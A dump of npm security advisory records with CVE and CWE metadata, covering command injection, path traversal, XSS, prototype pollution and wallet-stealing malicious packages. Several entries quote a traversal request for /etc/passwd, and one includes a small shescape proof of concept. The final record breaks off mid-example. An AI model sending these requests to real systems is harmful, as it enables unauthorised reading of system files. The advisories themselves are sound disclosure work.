2021-01-20T21:22:37Z
|
MODERATE
| null |
{'CWE-453', 'CWE-346'}
|
{'https://snyk.io/vuln/SNYK-JS-SOCKETIO-1024859', 'https://github.com/socketio/socket.io/commit/f78a575f66ab693c3ea96ea88429ddb1a44c86c7', 'https://github.com/socketio/socket.io/issues/3671', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28481', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1056357', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1056358'}
| null |
npm
|
GHSA-jff2-qjw8-5476
|
Command Injection Vulnerability in systeminformation
|
### Impact
command injection vulnerability
### Patches
Problem was fixed with a parameter check. Please upgrade to version >= 5.6.4
### Workarounds
If you cannot upgrade, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
|
{'CVE-2021-21388'}
|
2021-04-29T17:22:56Z
|
2021-04-06T17:30:14Z
|
HIGH
| null |
{'CWE-77', 'CWE-78'}
|
{'https://github.com/sebhildebrandt/systeminformation/commit/7922366d707de7f20995fc8e30ac3153636bf35f', 'https://www.npmjs.com/package/systeminformation', 'https://github.com/sebhildebrandt/systeminformation/commit/01ef56cd5824ed6da1c11b37013a027fdef67524', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21388', 'https://github.com/sebhildebrandt/systeminformation/commit/0be6fcd575c05687d1076d5cd6d75af2ebae5a46', 'https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-jff2-qjw8-5476'}
| null |
npm
|
GHSA-5955-9wpr-37jh
|
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
|
### Impact
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be outside of the extraction target directory is not extracted. This is, in part, accomplished by sanitizing absolute paths of entries within the archive, skipping archive entries that contain `..` path portions, and resolving the sanitized paths against the extraction target directory.
This logic was insufficient on Windows systems when extracting tar files that contained a path that was not an absolute path, but specified a drive letter different from the extraction target, such as `C:some\path`. If the drive letter does not match the extraction target, for example `D:\extraction\dir`, then the result of `path.resolve(extractionDirectory, entryPath)` would resolve against the current working directory on the `C:` drive, rather than the extraction target directory.
Additionally, a `..` portion of the path could occur immediately after the drive letter, such as `C:../foo`, and was not properly sanitized by the logic that checked for `..` within the normalized and split portions of the path.
This only affects users of `node-tar` on Windows systems.
### Patches
4.4.18 || 5.0.10 || 6.1.9
### Workarounds
There is no reasonable way to work around this issue without performing the same path normalization procedures that node-tar now does.
Users are encouraged to upgrade to the latest patched versions of node-tar, rather than attempt to sanitize paths themselves.
### Fix
The fixed versions strip path roots from all paths prior to being resolved against the extraction target folder, even if such paths are not "absolute".
Additionally, a path starting with a drive letter and then two dots, like `c:../`, would bypass the check for `..` path portions. This is checked properly in the patched versions.
Finally, a defense in depth check is added, such that if the `entry.absolute` is outside of the extraction taret, and we are not in preservePaths:true mode, a warning is raised on that entry, and it is skipped. Currently, it is believed that this check is redundant, but it did catch some oversights in development.
|
{'CVE-2021-37713'}
|
2021-08-31T16:02:32Z
|
2021-08-31T16:05:05Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://www.npmjs.com/package/tar', 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/npm/node-tar/security/advisories/GHSA-5955-9wpr-37jh', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37713', 'https://github.com/npm/node-tar'}
| null |
npm
|
GHSA-98f7-p5rc-jx67
|
Cross-Site Scripting in materialize-css
|
All versions of `materialize-css` are vulnerable to Cross-Site Scripting. The `tooltip` component does not sufficiently sanitize user input, allowing an attacker to execute arbitrary JavaScript code if the malicious input is rendered by a user.
## Recommendation
No fix is currently available. Consider using an alternative module until a fix is made available.
|
{'CVE-2019-11002'}
|
2021-09-07T20:45:52Z
|
2019-04-09T19:44:40Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://snyk.io/vuln/SNYK-JS-MATERIALIZECSS-174148', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11002', 'https://github.com/advisories/GHSA-98f7-p5rc-jx67', 'https://github.com/Dogfalo/materialize/issues/6286', 'https://github.com/Dogfalo/materialize', 'https://www.npmjs.com/advisories/818'}
| null |
npm
|
GHSA-cr6c-85fh-cqpg
|
Downloads Resources over HTTP in haxeshim
|
Affected versions of `haxeshim` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `haxeshim`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10692'}
|
2021-09-09T20:49:32Z
|
2018-07-31T22:27:04Z
|
HIGH
| null | null |
{'https://nodesecurity.io/advisories/300', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10692', 'https://github.com/advisories/GHSA-cr6c-85fh-cqpg', 'https://www.npmjs.com/advisories/300'}
| null |
npm
|
GHSA-qh2h-chj9-jffq
|
Command Injection in growl
|
Affected versions of `growl` do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.
## Recommendation
Update to version 1.10.2 or later.
|
{'CVE-2017-16042'}
|
2020-08-31T18:12:25Z
|
2018-06-08T12:43:43Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://www.npmjs.com/advisories/146', 'https://github.com/tj/node-growl/pull/61', 'https://nodesecurity.io/advisories/146', 'https://github.com/tj/node-growl/issues/60', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16042', 'https://github.com/advisories/GHSA-qh2h-chj9-jffq'}
| null |
npm
|
GHSA-446w-rrm4-r47f
|
Exposure of home directory through shescape on Unix with Bash
|
### Impact
The issue allows for exposure of the home directory on Unix systems when using Bash with the `escape` or `escapeAll` functions from the _shescape_ API with the `interpolation` option set to `true`. Other tested shells, Dash and Zsh, are not affected.
```javascript
const cp = require("child_process");
const shescape = require("shescape");
const payload = "home_directory=~";
const options = { interpolation: true };
console.log(cp.execSync(`echo ${shescape.escape(payload, options)}`));
// home_directory=/home/user
```
Depending on how the output of _shescape_ is used, directory traversal may be possible in the application using _shescape_.
### Patches
The issue was patched in `v1.5.1`.
### Workarounds
Manually escape all instances of the tilde character (`~`) using `arg.replace(/~/g, "\\~")`.
### References
See GitHub issue https://github.com/ericcornelissen/shescape/issues/169.
|
{'CVE-2022-24725'}
|
2022-03-18T20:06:07Z
|
2022-03-03T19:26:11Z
|
MODERATE
| null |
{'CWE-200'}
|
{'https://github.com/ericcornelissen/shescape', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24725', 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-446w-rrm4-r47f', 'https://github.com/ericcornelissen/shescape/issues/169', 'https://github.com/ericcornelissen/shescape/pull/170'}
| null |
npm
|
GHSA-jrj9-5qp6-2v8q
|
Machine-In-The-Middle in airtable
|
Affected versions of `airtable` are vulnerable to Machine-In-The-Middle. The package has SSL certificate validation disabled by default unintentionally. This may allow attackers in a privileged network position to decrypt intercepted traffic.
## Recommendation
Upgrade to version 0.7.2 or later.
| null |
2020-08-31T18:54:28Z
|
2020-09-03T23:22:19Z
|
HIGH
| null | null |
{'https://www.npmjs.com/advisories/1305'}
| null |
npm
|
GHSA-552w-rqg8-gxxm
|
Moderate severity vulnerability that affects validator
|
The validator module before 1.1.0 for Node.js allows remote attackers to bypass the cross-site scripting (XSS) filter via vectors related to UI redressing.
|
{'CVE-2013-7453'}
|
2021-09-01T19:26:29Z
|
2017-10-24T18:33:36Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/advisories/GHSA-552w-rqg8-gxxm', 'https://nvd.nist.gov/vuln/detail/CVE-2013-7453', 'http://www.openwall.com/lists/oss-security/2016/04/20/11', 'https://nodesecurity.io/advisories/41'}
| null |
npm
|
GHSA-5726-g6r9-5f22
|
Potential for Script Injection in syntax-error
|
Versions of `syntax-error` prior to 1.1.1 are affected by a cross-site scripting vulnerability which may allow a malicious file to execute code when browserified.
## Recommendation
Update to version 1.1.1 or later.
|
{'CVE-2014-7192'}
|
2022-02-25T19:54:10Z
|
2017-10-24T18:33:36Z
|
HIGH
| null |
{'CWE-94'}
|
{'https://exchange.xforce.ibmcloud.com/vulnerabilities/96728', 'https://github.com/substack/node-syntax-error', 'https://nvd.nist.gov/vuln/detail/CVE-2014-7192', 'https://nodesecurity.io/advisories/syntax-error-potential-script-injection', 'https://www.npmjs.com/advisories/37', 'https://github.com/substack/node-browserify/blob/master/changelog.markdown#421', 'https://github.com/advisories/GHSA-5726-g6r9-5f22', 'http://www-01.ibm.com/support/docview.wss?uid=swg21690815', 'https://github.com/substack/node-syntax-error/commit/9aa4e66eb90ec595d2dba55e6f9c2dd9a668b309'}
| null |
npm
|
GHSA-9298-m7jf-55h2
|
Malicious Package in bitconid-rpc
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-01T20:43:38Z
|
2020-09-04T16:42:08Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1369'}
| null |
npm
|
GHSA-pxqp-mv67-g528
|
Malicious Package in bqffer-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-29T20:53:05Z
|
2020-09-03T21:38:34Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1230'}
| null |
npm
|
GHSA-5jg5-w395-9684
|
Directory Traversal in ltt
|
Affected versions of `ltt` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16212'}
|
2020-08-31T18:22:31Z
|
2018-07-23T20:39:59Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/ltt', 'https://www.npmjs.com/advisories/422', 'https://github.com/advisories/GHSA-5jg5-w395-9684', 'https://nodesecurity.io/advisories/422', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16212'}
| null |
npm
|
GHSA-x5r6-x823-9848
|
Arbitrary Code Execution in json-ptr
|
npm `json-ptr` before 2.0.0 has an arbitrary code execution vulnerability. The issue occurs in the set operation (https://flitbit.github.io/json-ptr/classes/_src_pointer_.jsonpointer.htmlset) when the force flag is set to true. The function recursively set the property in the target object, however it does not properly check the key being set, leading to a prototype pollution.
|
{'CVE-2020-7766'}
|
2021-05-26T19:58:35Z
|
2021-05-10T19:15:43Z
|
HIGH
| null |
{'CWE-74', 'CWE-400'}
|
{'https://github.com/flitbit/json-ptr/blob/master/src/util.ts%23L174', 'https://github.com/418sec/json-ptr/pull/3', 'https://snyk.io/vuln/SNYK-JS-JSONPTR-1016939', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038396', 'https://www.huntr.dev/bounties/2-npm-json-ptr/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7766', 'https://www.npmjs.com/package/json-ptr'}
| null |
npm
|
GHSA-h6ch-v84p-w6p9
|
Regular Expression Denial of Service (ReDoS)
|
A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
| null |
2021-02-24T19:27:02Z
|
2019-06-13T18:58:54Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://github.com/kpdecker/jsdiff/commit/2aec4298639bf30fb88a00b356bf404d3551b8c0', 'https://snyk.io/vuln/npm:diff:20180305', 'https://www.npmjs.com/advisories/1631', 'https://www.whitesourcesoftware.com/vulnerability-database/WS-2018-0590', 'https://bugzilla.redhat.com/show_bug.cgi?id=1552148'}
| null |
npm
|
GHSA-fwr7-v2mv-hh25
|
Prototype Pollution in async
|
A vulnerability exists in Async through 3.2.1 for 3.x and through 2.6.3 for 2.x (fixed in 3.2.2 and 2.6.4), which could let a malicious user obtain privileges via the `mapValues()` method.
|
{'CVE-2021-43138'}
|
2022-04-14T17:42:10Z
|
2022-04-07T00:00:17Z
|
HIGH
| null |
{'CWE-1321'}
|
{'https://github.com/caolan/async/blob/master/lib/internal/iterator.js', 'https://jsfiddle.net/oz5twjd9/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43138', 'https://github.com/caolan/async/blob/v2.6.4/CHANGELOG.md#v264', 'https://github.com/caolan/async', 'https://github.com/caolan/async/commit/8f7f90342a6571ba1c197d747ebed30c368096d2', 'https://github.com/caolan/async/blob/master/lib/mapValuesLimit.js', 'https://github.com/caolan/async/pull/1828', 'https://github.com/caolan/async/commit/e1ecdbf79264f9ab488c7799f4c76996d5dca66d'}
| null |
npm
|
GHSA-4vfj-c2xf-8r48
|
Directory Traversal in looppake
|
Affected versions of `looppake` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16169'}
|
2020-08-31T18:22:07Z
|
2018-07-23T20:45:20Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://nodesecurity.io/advisories/412', 'https://www.npmjs.com/advisories/412', 'https://github.com/advisories/GHSA-4vfj-c2xf-8r48', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16169', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/looppake'}
| null |
npm
|
GHSA-f7vx-j8mp-3h2x
|
Insufficient Verification of Data Authenticity in Eclipse Theia
|
In Eclipse Theia versions 0.3.9 through 0.15.0, one of the default pre-packaged Theia extensions is "Mini-Browser", published as "@theia/mini-browser" on npmjs.com. This extension, for its own needs, exposes a HTTP endpoint that allows to read the content of files on the hosts filesystem, given their path, without restrictions on the requesters origin. This design is vulnerable to being exploited remotely through a DNS rebinding attack or a drive-by download of a carefully crafted exploit.
|
{'CVE-2019-17636'}
|
2021-03-29T22:11:05Z
|
2021-04-13T15:18:01Z
|
HIGH
| null |
{'CWE-345'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-17636', 'https://github.com/eclipse-theia/theia/pull/7205', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=551747', 'https://github.com/eclipse-theia/theia/commit/b212d07f915df1509180944ee3132714bc2636bf'}
| null |
npm
|
GHSA-cfhh-xgwq-5r67
|
Sudden swap of user auth tokens in Volto
|
### Impact
Due to the usage of an outdated version of the react-cookie library, under the circumstances of given a server high load, it is possible that a user could get his/her auth cookie replaced with the auth cookie from another user, effectively giving him full access to the other users account and privileges. A proven exploit for this vulnerability does not exist, since the exact requisites for it to happen have not been fully clarified, and the attempts to reproduce it under testing conditions have been unsuccessful, but it still can happen randomly and unintentionally in the wild.
### Patches
The patch and fix is present in Volto 15.0.0-alpha.0 (or later). See PR: https://github.com/plone/volto/pull/3051.
We recommend upgrading to the final release of Volto 15 as soon as possible if running an affected version.
See the upgrade guide https://6-dev-docs.plone.org/volto/upgrade-guide/index.html#upgrading-to-volto-15-x-x
### Workarounds
It is possible to create a fix by manually upgrading the react-cookie package to 4.1.1 and then overriding all Volto components that use this library as in https://github.com/plone/volto/pull/3051. As this is substantial work, an update to the Volto 15 is recommended. The upgrade steps for going from Volto 14 to Volto 15 are quite easy and do not involve any complexity. Please take a look at the upgrade guide: https://6-dev-docs.plone.org/volto/upgrade-guide/index.html#upgrading-to-volto-15-x-x
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [volto](https://github.com/plone/volto/issues)
* Email us at [security@plone.org](mailto:security@plone.org)
|
{'CVE-2022-24740'}
|
2022-03-28T22:30:25Z
|
2022-03-14T22:15:19Z
|
MODERATE
| null |
{'CWE-287'}
|
{'https://github.com/plone/volto/pull/3051', 'https://github.com/plone/volto', 'https://github.com/plone/volto/security/advisories/GHSA-cfhh-xgwq-5r67', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24740'}
| null |
npm
|
GHSA-w7jx-j77m-wp65
|
Cross-site scripting vulnerability in TinyMCE
|
### Impact
A cross-site scripting (XSS) vulnerability was discovered in the URL sanitization logic of the core parser. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor using the clipboard or APIs. This impacts all users who are using TinyMCE 5.5.1 or lower.
### Patches
This vulnerability has been patched in TinyMCE 5.6.0 by improved URL sanitization logic.
### Workarounds
To work around this vulnerability, either:
- Upgrade to TinyMCE 5.6.0 or higher
- Manually sanitize `iframe`, `object` and `embed` URL attributes using a [TinyMCE node filter](https://www.tiny.cloud/docs/api/tinymce.html/tinymce.html.domparser/#addnodefilter).
- Disable `iframe`, `object`, and `embed` elements in your content using the [invalid_elements](https://www.tiny.cloud/docs/configure/content-filtering/#invalid_elements) setting.
#### Example: Sanitizing using a node filter
```js
editor.parser.addNodeFilter('iframe,object,embed', function(nodes) {
nodes.forEach(function(node) {
if (node.attributes) {
node.attributes.forEach(function(attr) {
var name = attr.name;
var value = attr.value;
// Sanitize the attribute value here or remove it entirely
var sanitizedValue = ...;
node.attr(name, santizedValue);
});
}
});
});
```
#### Example: Using invalid_elements
```js
invalid_elements: 'iframe,object,embed'
```
### Acknowledgements
Tiny Technologies would like to thank Aaron Bishop at SecurityMetrics for discovering this vulnerability.
### References
https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes
### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)
* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)
| null |
2021-01-06T19:27:46Z
|
2021-01-06T19:27:54Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/tinymce/tinymce/security/advisories/GHSA-w7jx-j77m-wp65', 'https://www.tiny.cloud/docs/release-notes/release-notes56/#securityfixes', 'https://www.npmjs.com/package/tinymce'}
| null |
npm
|
GHSA-rrqm-p222-8ph2
|
Prototype Pollution in Dynamoose
|
### Impact
In Dynamoose versions 2.0.0-2.6.0 there was a prototype pollution vulnerability in the internal utility method [`lib/utils/object/set.ts`](https://github.com/dynamoose/dynamoose/blob/master/lib/utils/object/set.ts). This method is used throughout the codebase for various operations throughout Dynamoose.
We have not seen any evidence of this vulnerability being exploited.
We do not believe this issue impacts v1.x.x since this method was added as part of the v2 rewrite. This vulnerability also impacts v2.x.x beta/alpha versions.
### Patches
v2.7.0 includes a patch for this vulnerability.
### Workarounds
We are unaware of any workarounds to patch this vulnerability other than upgrading to v2.7.0 or greater.
### References
- Patch commit hash: 324c62b4709204955931a187362f8999805b1d8e
### For more information
If you have any questions or comments about this advisory:
* [Contact me](https://charlie.fish/contact)
* [Read our Security Policy](https://github.com/dynamoose/dynamoose/blob/master/SECURITY.md)
### Credit
- GitHub CodeQL Code Scanning
|
{'CVE-2021-21304'}
|
2021-08-23T22:30:48Z
|
2021-02-08T17:44:01Z
|
MODERATE
| null |
{'CWE-915', 'CWE-1321'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-21304', 'https://github.com/dynamoose/dynamoose/releases/tag/v2.7.0', 'https://github.com/dynamoose/dynamoose', 'https://github.com/dynamoose/dynamoose/security/advisories/GHSA-rrqm-p222-8ph2', 'https://www.npmjs.com/package/dynamoose', 'https://github.com/dynamoose/dynamoose/commit/324c62b4709204955931a187362f8999805b1d8e'}
| null |
npm
|
GHSA-vv7g-pjw9-4qj9
|
Malicious Package in scrytsy
|
All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-10-04T15:24:14Z
|
2020-09-03T17:03:56Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1408'}
| null |
npm
|
GHSA-rmmc-8cqj-hfp3
|
Authentication Bypass in otpauth
|
Versions of `otpauth` prior to 3.2.8 are vulnerable to Authentication Bypass. The package's `totp.validate()` function may return positive values for single digit tokens even if they are invalid. This may allow attackers to bypass the OTP authentication by providing single digit tokens.
## Recommendation
Upgrade to version 3.2.8 or later.
| null |
2020-08-31T18:46:51Z
|
2020-09-03T18:24:43Z
|
HIGH
| null |
{'CWE-287'}
|
{'https://www.npmjs.com/advisories/1087'}
| null |
npm
|
GHSA-w7fj-336r-vw49
|
Cross-Site Scripting vulnerability in @backstage/plugin-auth-backend
|
### Impact
This vulnerability allows a malicious actor to trick another user into visiting a vulnerable URL that executes an XSS attack. This attack can potentially allow the attacker to exfiltrate access tokens or other secrets from the user's browser. The default CSP does prevent this attack, but it is expected that some deployments have these policies disabled due to incompatibilities.
### Patches
This is vulnerability is patched in version `0.4.9` of `@backstage/plugin-auth-backend`.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [Backstage repository](https://github.com/backstage/backstage)
* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)
|
{'CVE-2021-43776'}
|
2021-12-01T14:35:30Z
|
2021-12-01T18:29:21Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://github.com/backstage/backstage/security/advisories/GHSA-w7fj-336r-vw49', 'https://github.com/backstage/backstage', 'https://github.com/backstage/backstage/tree/master/plugins/auth-backend', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43776'}
| null |
npm
|
GHSA-jqh7-w5pr-cr56
|
Cross-site scripting in koa-shopify-auth
|
A cross-site scripting vulnerability exists in koa-shopify-auth v3.1.61-v3.1.62 that allows an attacker to inject JS payloads into the `shop` parameter on the `/shopify/auth/enable_cookies` endpoint.
|
{'CVE-2020-8176'}
|
2021-05-11T18:29:58Z
|
2021-05-17T21:01:22Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://github.com/Shopify/quilt/pull/1455', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8176', 'https://hackerone.com/reports/881409'}
| null |
npm
|
GHSA-m7p2-ghfh-pjvx
|
Vulnerability in crunch function leads to arbitrary code execution via filePath parameters
|
aaptjs is a node wraper for aapt. An issue was discovered in the crunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.
|
{'CVE-2020-36380'}
|
2022-05-04T03:44:50Z
|
2021-11-01T19:18:51Z
|
CRITICAL
| null |
{'CWE-77', 'CWE-78'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-36380', 'https://github.com/shenzhim/aaptjs/issues/2', 'https://github.com/shenzhim/aaptjs'}
| null |
npm
|
GHSA-5mrr-rgp6-x4gr
|
Command Injection in marsdb
|
All versions of `marsdb` are vulnerable to Command Injection. In the `DocumentMatcher` class, selectors on `$where` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
| null |
2020-08-31T18:48:01Z
|
2020-09-03T19:39:05Z
|
CRITICAL
| null |
{'CWE-77'}
|
{'https://github.com/bkimminich/juice-shop/issues/1173', 'https://www.npmjs.com/advisories/1122'}
| null |
npm
|
GHSA-f9mq-jph6-9mhm
|
Arbitrary file read via window-open IPC in Electron
|
### Impact
The vulnerability allows arbitrary local file read by defining unsafe window options on a child window opened via window.open.
### Workarounds
Ensure you are calling `event.preventDefault()` on all [`new-window`](https://electronjs.org/docs/api/web-contents#event-new-window) events where the `url` or `options` is not something you expect.
### Fixed Versions
* `9.0.0-beta.21`
* `8.2.4`
* `7.2.4`
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@electronjs.org](mailto:security@electronjs.org)
|
{'CVE-2020-4075'}
|
2021-01-07T23:48:36Z
|
2020-07-07T00:01:13Z
|
MODERATE
| null |
{'CWE-552'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-4075', 'https://github.com/electron/electron/security/advisories/GHSA-f9mq-jph6-9mhm', 'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824'}
| null |
npm
|
GHSA-2fqv-h3r5-m4vf
|
Cross Site Scripting (XSS) in plotly.js
|
Affected versions of `plotly.js` are vulnerable to cross-site scripting if an attacker can convince a user to visit a malicious plot on a site using this package.
## Recommendation
Update to 1.16.0 or later.
|
{'CVE-2017-1000006'}
|
2021-08-30T21:12:50Z
|
2017-10-24T18:33:35Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/145', 'https://acloudtree.com/2016-08-09-how-i-hacked-plotly-by-exploiting-a-svg-vulnerability-in-plotlyjs/', 'http://help.plot.ly/security-advisories/2016-08-08-plotlyjs-xss-advisory/', 'https://github.com/advisories/GHSA-2fqv-h3r5-m4vf', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000006'}
| null |
npm
|
GHSA-jpg7-6c9f-7q54
|
Directory Traversal in datachannel-client
|
Affected versions of `datachannel-client` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16121'}
|
2020-08-31T18:21:31Z
|
2018-07-23T23:15:21Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://github.com/advisories/GHSA-jpg7-6c9f-7q54', 'https://nodesecurity.io/advisories/391', 'https://www.npmjs.com/advisories/391', 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/datachannel-client', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16121'}
| null |
npm
|
GHSA-5j3g-jfq3-7jwx
|
Arbitrary JavaScript Execution in bassmaster
|
A vulnerability exists in bassmaster <= 1.5.1 that allows for an attacker to provide arbitrary JavaScript that is then executed server side via eval.
## Recommendation
Update to bassmaster version 1.5.2 or greater.
|
{'CVE-2014-7205'}
|
2021-09-01T22:16:02Z
|
2017-10-24T18:33:36Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2014-7205', 'https://nodesecurity.io/advisories/bassmaster_js_injection', 'https://www.npmjs.com/advisories/1', 'https://github.com/hapijs/bassmaster/commit/b751602d8cb7194ee62a61e085069679525138c4', 'https://github.com/hapijs/bassmaster', 'https://www.exploit-db.com/exploits/40689/', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/96730', 'http://www.securityfocus.com/bid/70180', 'http://www.openwall.com/lists/oss-security/2014/09/30/10', 'https://github.com/advisories/GHSA-5j3g-jfq3-7jwx'}
| null |
npm
|
GHSA-gjm5-83cw-p3p2
|
Prototype Pollution in extend2
|
The package extend2 before 1.0.1 are vulnerable to Prototype Pollution via the extend function due to unsafe recursive merge.
|
{'CVE-2021-23568'}
|
2022-01-11T18:11:48Z
|
2022-01-12T22:59:13Z
|
HIGH
| null |
{'CWE-1321'}
|
{'https://github.com/eggjs/extend2/pull/2', 'https://snyk.io/vuln/SNYK-JS-EXTEND2-2320315', 'https://github.com/eggjs/extend2', 'https://github.com/eggjs/extend2/commit/aa332a59116c8398976434b57ea477c6823054f8', 'https://github.com/eggjs/extend2/blob/master/index.js%23L50-L60', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23568'}
| null |
npm
|
GHSA-mg3m-f475-28hv
|
Path Traversal in @backstage/plugin-scaffolder-backend
|
### Impact
A malicious actor with write access to a registered scaffolder template is able to manipulate the template in a way that writes files to arbitrary paths on the scaffolder-backend host instance.
This vulnerability can in some situation also be exploited through user input when executing a template, meaning you do not need write access to the templates. This method will not allow the attacker to control the contents of the injected file however, unless the template is also crafted in a specific way that gives control of the file contents.
### Patches
This vulnerability is fixed in version `0.15.14` of the `@backstage/plugin-scaffolder-backend`.
### Workarounds
This attack is mitigated by restricting access and requiring reviews when registering or modifying scaffolder templates.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in the [Backstage repository](https://github.com/backstage/backstage)
* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)
|
{'CVE-2021-43783'}
|
2021-11-29T20:22:25Z
|
2021-12-01T18:28:51Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://github.com/backstage/backstage', 'https://github.com/backstage/backstage/security/advisories/GHSA-mg3m-f475-28hv', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43783', 'https://github.com/backstage/backstage/commit/f9352ab606367cd9efc6ff048915c70ed3013b7f'}
| null |
npm
|
GHSA-hfq9-rfpv-j8r8
|
Command Injection in pidusage
|
Affected versions of `pidusage` pass unsanitized input to `child_process.exec()`, resulting in arbitrary code execution in the `ps` method.
This package is vulnerable to this PoC on Darwin, SunOS, FreeBSD, and AIX.
Windows and Linux are not vulnerable.
## Proof of Concept
```
var pid = require('pidusage');
